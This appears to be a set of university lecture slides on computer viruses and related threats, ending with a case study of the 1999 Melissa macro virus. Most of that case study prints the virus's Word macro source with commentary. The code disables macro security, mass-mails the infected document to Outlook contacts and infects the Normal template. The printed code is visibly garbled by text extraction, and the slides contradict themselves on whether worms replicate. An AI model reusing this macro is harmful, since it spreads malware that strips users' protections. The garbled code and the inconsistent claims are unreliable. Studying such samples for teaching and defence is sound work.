You are on page 1of 42

Chapter 10

Viruses and related


threats

Ali Saleh Chap10 1


Outline

• Viruses and Related Threats


– Malicious Programs
– The Nature of Viruses
– Antivirus Approaches
– Advanced Antivirus Techniques

Ali Saleh Chap10 2


Computer Viruses
A computer virus is a small
program that attaches itself to
another program and attacks
other software by making copies
of itself.

Ali Saleh Chap10 3


What is a Computer Virus?
• Computer Virus - The term was first
used by Fred Cohen in 1984.
• A computer virus is a small program that
attaches itself to another program and
attacks other software by making copies
of itself.
• A virus executes when an infected
program is executed. Therefore only
executable files can be infected.

Ali Saleh Chap10 4


Computer Viruses are Small
• Virus programs, like the infectious
microorganisms that are their
namesakes, are often small.
• Only a few lines of program code are
required to write a simple virus.
• The implication is clear: viruses can
be easily hidden in healthy software
and therefore prove very difficult to
find. Ali Saleh Chap10 5
Viruses attach to programs
Virus Virus
+ Code = Code

Original
Program

Modified
Program

Ali Saleh Chap10 6


Viruses can be easily
hidden in healthy software
Virus
+ Code =

Original
Program
Modified
Program

Ali Saleh Chap10 7


Who Do Computer Viruses
Infect and How?
• Viruses can infect any computer, from a small laptop to a
multi-million dollar mainframe.
• Anyone who owns a personal computer can create a virus
program. This means virus development tools are widely
available.
• Once written, a virus can be transmitted over telephone
lines or distributed on infected disks to other systems,
where it can reproduce in microseconds to damage the
biggest systems thousands of miles away.
• These two facts make it virtually impossible to trace any
virus back to the person who originally wrote it.

Ali Saleh Chap10 8


Destructive Non-Virus
Programs
• Aside from viruses, there are other
threats to user systems,including:
– Worms
– Trojan Horses
– Logic Bombs
• As well as being potentially
destructive by themselves, each can
also be used as a vehicle to propagate
any virus. Ali Saleh Chap10 9
Worms
• Worm - A worm is a program (usually
stand-alone) that worms its way
through either the computer's
memory or a disk and alters data that
it accesses.
• It is different from a computer virus
since it does not require a host.

Ali Saleh Chap10 10


Worms
• Worms are constructed to infiltrate legitimate data
processing programs and alter or destroy the data. Often
what people believe is a virus infection is, in fact, a worm
program. This is not as serious because worms do not
replicate themselves. But the damage caused by a worm
attack can be just as serious as a virus, especially if not
discovered in time. For example, suppose a worm program
instructs a bank’s computer to transfer funds to an illicit
account. The fund transfers may continue even after the
worm is destroyed. However, once the worm invasion is
discovered, recovery is much easier because there is only a
single copy of the worm program to destroy since the
replicating ability of the virus is absent. This capability may
enable it to re-infect a system several times. A worm is
similar to a benign tumor while a virus is like a malignant one.

Ali Saleh Chap10 11


Trojan Horses
• Trojan horse - A program which attaches
itself to a seemingly innocent program.
• A Trojan Horse is a destructive program
that has been disguised (or concealed in) an
innocuous piece of software.
• Worm and virus programs may be concealed
within a Trojan Horse.
• Trojan horses do not necessarily replicate
- Trojan Horses are not viruses because
they do not reproduce themselves and
spread as viruses do.
Ali Saleh Chap10 12
Trojan Horses
• The mythical story of the original Trojan Horse is
well known. When Greek warriors concealed
themselves in an attractive wooden horse and left
it outside the gates of the besieged city of Troy,
the Trojans assumed it was a friendly peace
offering and took it in. The Greek warriors then
leaped out and wreaked havoc. Trojan Horse
software works on the same principle. A program
may seem both attractive and innocent, inviting
the computer user to copy (or download) the
software and run it. Trojan Horses may be games
or some other software that the victim will be
tempted to try.
Ali Saleh Chap10 13
Logic Bombs / Time Bomb
• Logic or time bomb - A program that
is activated or triggered after or
during a certain event.
• This may be after several executions
or on a certain day like Friday the
13th.

Ali Saleh Chap10 14


Logic Bombs
• Writing a logic bomb program is similar to creating
a Trojan Horse. Both also have about the same
ability to damage data, too. Logic bombs include a
timing device so it will go off at a particular date
and time.
• The Michelangelo virus is embedded in a logic bomb,
for example. Other virus programs often include
coding similar to that used in logic bombs, but the
bombs can be very destructive on their own, even if
they lack the ability of the virus to reproduce. One
logic bomb caused major problems in the Los
Angeles water department’s system.
Ali Saleh Chap10 15
Logic Bombs
• Logic bombs are usually timed to do maximum
damage. That means the logic bomb is a favored
device for revenge by disgruntled former
employees who can set it to activate after they
have left the company. One common trigger
occurs when the dismissed employee’s name is
deleted from payroll records. On one occasion, a
student left a logic bomb timed to explode and
wipe out his university’s records well after he
had collected his degree and was long gone. This
example illustrates the pernicious nature of
logic bombs which can be written literally
decades before they explode.
Ali Saleh Chap10 16
Rabbit
• A program that replicates itself without
limit to exhaust a resource.
• For example a program that keeps on
making copies of itself on the hard disk
till no hard disk space is left.
• Or a program that keeps loading
instances of itself in the memory till all
available memory is exhausted and the
system is unable to perform due to
unavailability of free memory.
• Rabbits are also called bacteria.
Ali Saleh Chap10 17
Summary of Malicious Code
Code Type Characteristics

Virus Attaches itself to program and propagates


copies of itself to other programs

Trojan horse Contains unexpected, additional functionality

Logic bomb Triggers action when condition occurs

Time bomb Triggers action when specified time occurs

Trapdoor Allows unauthorized access to functionality

Worm Propagates copies of itself through a network


Ali Saleh Chap10 18
Rabbit Replicates itself without limit to exhaust a
Summary of Malicious Code
Malicious
Programs

Needs host
Independent
program

Logic Trojan
Trapdoors Viruses Bacteria Worm
bombs horses

Ali Saleh Chap10 19


Replicate
Virus Phases
• Dormant phase - the virus is idle
• Propagation phase - the virus places an
identical copy of itself into other programs
• Triggering phase – the virus is activated
to perform the function for which it was
intended
• Execution phase – the function is
performed

Ali Saleh Chap10 20


Virus Protection
Have a well-known virus protection program, configured to
scan disks and downloads automatically for known viruses.

Do not execute programs (or "macro's") from unknown


sources (e.g., PS files, Hypercard files, MS Office documents,

Avoid the most common operating systems and email

programs, if possible.

Ali Saleh Chap10 21


Types of Viruses
• Parasitic Virus - attaches itself to executable files as part
of their code. Runs whenever the host program runs.

• Memory-resident Virus - Lodges in main memory as part of


the residual operating system.

• Boot Sector Virus - infects the boot sector of a disk, and


spreads when the operating system boots up (original DOS
viruses).

• Stealth Virus - explicitly designed to hide from Virus


Scanning programs.

• Polymorphic Virus - mutates with every new host to prevent


signature detection.
Ali Saleh Chap10 22
Macro Viruses
• Microsoft Office applications allow
“macros” to be part of the document. The
macro could run whenever the document is
opened, or when a certain command is
selected (Save File).
• Platform independent.
• Infect documents, delete files, generate
email and edit letters.

Ali Saleh Chap10 23


Antivirus Approaches
1st Generation, Scanners: searched files for any of a
library of known virus “signatures.” Checked
executable files for length changes.

2nd Generation, Heuristic Scanners: looks for more


general signs than specific signatures (code
segments common to many viruses). Checked files
for checksum or hash changes.

3rd Generation, Activity Traps: stay resident in


memory and look for certain patterns of software
behavior (e.g., scanning files).

4th Generation, Full Featured: combine the best of


the techniques above.
Ali Saleh Chap10 24
Advanced Antivirus
Techniques

Ali Saleh Chap10 25


Melissa Virus

Ali Saleh Chap10 26


Background
 On Friday March 26, 1999 The Melissa Virus was launched.
 On Saturday, March 27 CERT issued CA-99-04
 By Sunday ,March 28, Melissa had reached at least 100,000 computers at over 300
organizations.
 On Monday, March 29, Christopher Bubb, Head, Computer Analysis and
Technology, NJ State Division of Criminal Justice, received a call from John Ryan,
Assoc General counsel for AOL, notifying him that:
AOL was a conduit for the release of Melissa.
An alt.sex site had promised a list of sexually oriented web site through a file
called list.zip.
Personnel who downloaded and ran the program released the virus.
 AOL tagged individual messages with a unique ID number which provided
information on the equipment the message came from.
 Melissa had originated at a New Jersey ISP, Monmouth Internet.

Ali Saleh Chap10 27


Background Contd
 On Tuesday March 30, Bubb obtained search warrants authorizing AOL and
Monmouth ISP to release information beyond what the investigators could observe.
 Monmouth ISP furnished the New Jersey investigators two Automatic Number Index
(ANI - caller ID) which provided:
 The originating telephone and house containing the telephone.
 A second telephone located at a business address.
 The NJ investigators obtained a search warrant for the Aberdeen, NJ residence,
however, the suspect had fled taking his computers with him.
 Subsequent detective work lead them to his brother's house.
 David L. Smith, 30, was apprehended at 0900, Thursday, April 1, just 4 days after
Bubb had been notified.
 Smith admitted to causing $80M in damage which is the upper limit in federal
sentencing guidelines.
 Melissa was named after an exotic dancer Smith had known while attending
school in Florida.
 Prosecutors recommended 3-5 years imprisonment

Ali Saleh Chap10 28


Melissa Code

Ali Saleh Chap10 29


Melissa Overview

The user opens a message with the Viral Code attached.


This automatically launches the Viral code due to the Open
event.
 The virus then checks and disables the security features.

The virus then started Outlook and sent a personalized message


to the first 50 entries.
The virus then modifies the Registry Key to contain the creators
name.
The virus then modifies NORMAL.DOT to contain the virus.

 The Author then provides comments and ends the virus.


Ali Saleh Chap10 30
Melissa works by infecting the Document_Open() macro of Microsoft Word.
Any code placed in Document_Open() macro is immediately run when the user opens the Word file.
The infected document is typically attached to an E-Mail.

******************************************************
Private Sub Document-Open() ' An OPEN event runs when the document is opened.
On Error Resume Next ' Forge ahead and do not display an error message block.
******************************************************
Melissa now disables the macro security features of Microsoft word.
This allows it to avoid alerting the user.
*************************************************************
If System.PrivateProfileString("",
"HKEY-CURRENT-USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""
Then 'If the value is blank disable the macro security and
'set the security level to 1
CommandBars("Macro") .Controls( "Security. ..") .Enabled = False
System.PrivateProfileString("",
"HKEY-CURRENT-USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1
Else 'An empty string indicates Word 97
CommandBars("Tools") .Controls("Macro") .Enabled = False 'Disable the macro menu
Options.ConfirmConversions = (1 - 1) : 'Turn off file conversion confirmation
Options.VirusProtection = (1 - 1) : 'Turn off Macro virus protection
Options. SaveNormalPrompt = (1 - 1) 'Turn off prompt to save the Normal template
Ali Saleh Chap10 31
End If
Melissa now accesses the E-Mail system through the Messaging API (MAPI)
feature.
It uses this access to send E-Mail to the first fifty entries.
*********************************************
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
'Variable Declaration
Set UngaDasOutlook = CreateObject("Outlook.Application")
'Create and instance of Outlook and reference it with the variable
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
'Assign the MAPI message store containing all Outlook items to the variable

********************************************
Melissa checks the Registry Key to see if it has already run.
**************************************************

If System.PrivateProfileString(" ", ' Begin the main loop


"HKEY-CURRENT-USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo "
'If this statement is true then execute the code otherwise go to ENDIF
Ali Saleh Chap10 32
Then
Melissa checks to see if the E-Mail application is Outlook.
If it is Outlook then a list of 50 E-Mail addresses is composed.
*************************************************
If UngaDasOutlook = "Outlook" ' Begin the 1st inner loop
Then DasMapiName.Logon "profile", "password"
'Log onto Outlook
For y = 1 To DasMapiName.AddressLists.Count ' Begin the 2nd inner loop
Set AddyBook = DasMapiName.AddressLists(y)
'Declare a variable and set it to the first Outlook address
x=1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
'Create a new mail message
For oo = 1 To AddyBook.AddressEntries.Count ' Begin 3rd inner loop
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
'Accumulate the Outlook Address in the variable
x=x+1
If x > 50 Then oo = AddyBook.AddressEntries.Count
'Terminate the loop after 50 entries
Ali Saleh Chap10 33
Next oo 'End 3rd inner loop
Melissa now sends an E-Mail to the 50 address found in the previous code.
The E-Mail is personalized using the victims name.
*******************************************************
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
'Concatenate the message with the Outlook user name
BreakUmOffASlice.Body = "Here is that document you asked for ..." &
" don't show anyone else ;-) 'A nudge-nudge, wink-wink suggestive message
*******************************************
Melissa now attaches itself to the EMail and sends it to the address.
 Melissa then logs off Outlook.
*******************************************
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send 'Send the message
Peep = " " 'Set Peep to an empty string
Next y 'End 2nd inner loop
DasMapiName.Logoff 'Logs off Outlook
Ali Saleh Chap10 34
End If 'End 1st inner loop
Melissa sets the registry Key to make sure that no more E-Mail is sent from
this host.
Melissa previously checked this entry.

*************************************
System.PrivateProfileString("",
"HKEY-CURRENT-USER\Software\Microsoft\Office\", "Melissa?") =
" ..by Kwyjibo"
'Sets the Melissa? Registry entry to the author.
'This prevents sending another message after reinfection.

End If 'End main loop

************************************

Ali Saleh Chap10 35


 Melissa checks to see if the active document is infected.
 If not then its sets the infection flag.
*********************************
Set ADIl = ActiveDocument.VBProject.VBComponents.ltem(1)
'Assign the first code module in the active document to the variable
Set NTIl = NormalTemplate.VBProject.VBComponents.ltem(1)
'Assign the first code module in the template document to the variable
NTCL = NTI1.CodeModule.CountOfLines 'Assign the number of code lines to the variable
ADCL = ADI1.CodeModule.CountOfLines 'Assign the number of code lines to the variable
BGN = 2
If ADI1.Name <> "Melissa" 'If the name Melissa is not present in the first VBComponent then.
Then
If ADCL > O 'If the lines in VBComponent are greater than 0 then
Then 'Delete all the lines and call the Name property Melissa
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True 'Set this variable to indicate that the Active Document is infected
End If
36
****************************************Ali Saleh Chap10
 It now checks to see if the normal.dot template is infected.
 If not then sets the infection flag and
 Then do a final check and if necessary Jump to the exit code CYA.
*********************************************

If NTI1.Name <> "Melissa"


Then
If NTCL > O Then NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect = NTI1
NTI1.Name = "Melissa"
dont = True 'Set this variable to indicate that the Template is infected

End If

If dont <> True And DoAD <> True Then GoTo CYA
********************************************
Ali Saleh Chap10 37
Melissa
now modifies the Document-Open() function of the Active
Document.
***************************************************

If dont = True
Then 'Delete each blank line of code at the beginning of the Active Document code module

Do While ADI1.CodeModule.Lines(1, 1) = " "


ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
'Add the opening lines of a Close event procedure to the ToInfect code module
Do While ADI1.CodeModule.Lines(BGN, 1) <> " "
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
'Move each line of Active Document code module to ToInfect starting with BGN = 2
BGN = BGN + 1
Loop
End If Ali Saleh Chap10 38
**************************************************************
Melissa now modifies the Document-Close() function of the Document
Template
 Created, closed, or modified documents will now run Melissa.
*********************************************************
If DoAD = True
Then 'Delete each blank line of code at the beginning of the Document template code module

Do While NTI1.CodeModule.Lines(1, 1) = " "


NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
'Add the opening lines of a Close event procedure to the ToInfect code module
Do While NTI1.CodeModule.Lines(BGN, 1) <> " "
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
'Move each line of Document Template code module to ToInfect starting with BGN = 2
BGN = BGN + 1
Loop
End If Ali Saleh Chap10 39
*********************************************************
 Melissa now saves the current active document and
 Saves a copy of itself.
*****************************************************
CYA: 'CYA Sub routine

If NTCL <> O And ADCL = O And


(InStr(l,ActiveDocument.Name,"Document" = False)

Then 'If the Active document does not start with Document then save it

ActiveDocument.SaveAsFileName:=ActiveDocument.FullName
ElseIf (InStr(l, ActiveDocument.Name, "Document") <> False)
Then ActiveDocument.Saved = True
'If the Active Document begins with Document set its Saved property to True

End If
**********************************************
Ali Saleh Chap10 40
The author now comments his code to reflect that he wrote Melissa and
Displays a character string based upon the if statement.
*********************************************
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 virus? Word 2000 Virus? You Decide!
'Word -> Ernail | Word 97 <-> Word 2000 ...it's a new age!

If Day (Now) = Minute (Now) ' if the 1st day and the 1st minute
Then Selection.TypeText " Twenty-two points, plus triple-word-
score, plus fifty points for using all my letters. Game's over. I'm
outta here."
End Sub
Ali Saleh Chap10 41
*************************************************************
End of Case

Ali Saleh Chap10 42

You might also like